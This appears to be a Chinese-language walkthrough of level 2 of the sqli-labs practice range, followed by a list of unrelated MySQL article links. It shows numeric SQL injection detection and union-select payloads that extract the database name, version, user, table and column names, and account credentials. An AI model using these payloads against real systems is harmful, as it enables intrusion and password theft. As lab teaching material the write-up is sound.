SQL注入sqli_labs靶场第二题

解题思路与第一题相同

?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。

联合查询:

猜解列名数量:3

?id=1 order by 4

判断回显点

?id=-1 union select 1,2,3

爆库、版本号、权限

?id=-1 union select 1,database(),version()--+
?id=-1 union select 1,2,user()--+

爆表、爆列

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1 union select 1,2,(select group_concat(username,password))from users

相关推荐
运维佬4 分钟前
在 MySQL 8.0 中,SSL 解密失败,在使用 SSL 加密连接时出现了问题
mysql·adb·ssl
Runing_WoNiu17 分钟前
MySQL与Oracle对比及区别
数据库·mysql·oracle
天道有情战天下38 分钟前
mysql锁机制详解
数据库·mysql
CodingBrother1 小时前
MySQL 中单列索引与联合索引分析
数据库·mysql
布川ku子2 小时前
[2024最新] java八股文实用版(附带原理)---Mysql篇
java·mysql·面试
晴天飛 雪2 小时前
Spring Boot MySQL 分库分表
spring boot·后端·mysql
yc_xym2 小时前
【MySQL】MySQL基础知识复习(上)
数据库·mysql
传说中高人2 小时前
MySQL技巧之跨服务器数据查询:基础篇-删除语句如何写
数据库·mysql
Suwg2093 小时前
【mysql】基于城市多边形,配合mysql库,查询目标点是否在指定城市内
数据库·mysql
小白起 v3 小时前
net start mysql发生系统错误 ,系统找不到指定的文件
mysql